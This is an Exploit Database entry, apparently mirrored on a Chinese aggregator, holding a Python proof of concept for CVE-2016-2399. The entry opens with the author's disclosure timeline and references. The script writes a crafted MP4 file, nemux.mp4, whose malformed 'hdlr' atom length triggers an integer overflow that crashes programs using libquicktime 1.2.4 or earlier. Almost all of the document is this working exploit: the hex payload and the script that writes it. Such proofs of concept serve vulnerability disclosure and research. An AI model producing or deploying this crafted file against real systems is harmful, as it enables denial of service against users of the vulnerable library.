libquicktime 1.2.4 – Integer Overflow

• Exploit Database
• 15 阅读

• 作者： Marco Romano
  日期： 2016-02-23
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/39487/

• #!/usr/bin/env python
  #
  ###
  # - 7 February 2016 -
  # My last bug hunting session (*for fun and no-profit*) 
  # has been dedicated to libquicktime
  ###
  # 
  # Author: Marco Romano - @nemux_ http://www.nemux.org
  # libquicktime 1.2.4 Integer Overflow
  #
  # Product Page: http://libquicktime.sourceforge.net/
  # Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow
  # Affected products: All products using libquicktime version <= 1.2.4
  #
  # CVE-ID: CVE-2016-2399 
  #
  # Disclosure part: http://www.nemux.org
  #
  ########
  ####### Timeline
  #
  # 07 Feb 2016 Bug discovered
  # 17 Feb 2016 Mitre.org contacted
  # 17 Feb 2016 Disclosed to the project's maintainer
  # 23 Feb 2016 No response from the maintainer
  # 23 Feb 2016 Publicly disclosed 
  #
  ########
  ####### References
  #
  # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399
  # http://libquicktime.sourceforge.net/
  # http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html 
  # https://en.wikipedia.org/wiki/QuickTime\_File\_Format
  #
  #######
  #
  # DISCLAIMER: It's just a PoC... it will crash something
  #
  #### 
  import sys
  import struct
  import binascii
  
  """
  There needs to be an mp4 file with these nested atoms to trigger the bug:
  moov -> trak -> mdia -> hdlr
  """
  hax0r_mp4 = ("0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1" 
   "6D6F6F76" #### moov atom
   "0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000"
   "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000" 
   "00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175"
   "7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000"
   "0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000" 
   "00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000" 
   "000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF" 
   "616C626D000000000000FEFF0000010000000E79727263000000000000000002E4"
   "7472616B" #### trak atom
   "0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000"
   "000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040"
   "6D646961" #### mdia atom
   "000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000"
   "4E" #### hdlr atom length
   "68646C72" #### hdlr atom
   "0000000000"
   "4141414141414141" #### our airstrip :)
   "0000000000000000000000" 
   "EC" #### 236 > 127 <-- overflow here and a change in signedness too
   "616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010")
  
  hax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))
  
  def createPoC():
  try:
  with open("./nemux.mp4","wb") as output:
  output.write(hax0r_mp4)
  print "[*] The PoC is done!"
  except Exception,e: 
  print str(e)
  print "[*] mmmm!"
  
  def usage():
  print "\nUsage? Run it -> " + sys.argv[0]
  print "this poc creates an mp4 file named nemux.mp4"
  print "--------------------------------------------"
  print "This dummy help? " + sys.argv[0] + " help\n" 
  sys.exit()
  
  if __name__ == "__main__":
  try:
  if len(sys.argv) == 2:
  usage()
  else:
  print "\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\n"
  print "Author: Marco Romano - @nemux_ - http://www.nemux.org\n\n";
  createPoC();
  except Exception,e: 
  print str(e)
  print "Ok... Something went wrong..."
  sys.exit()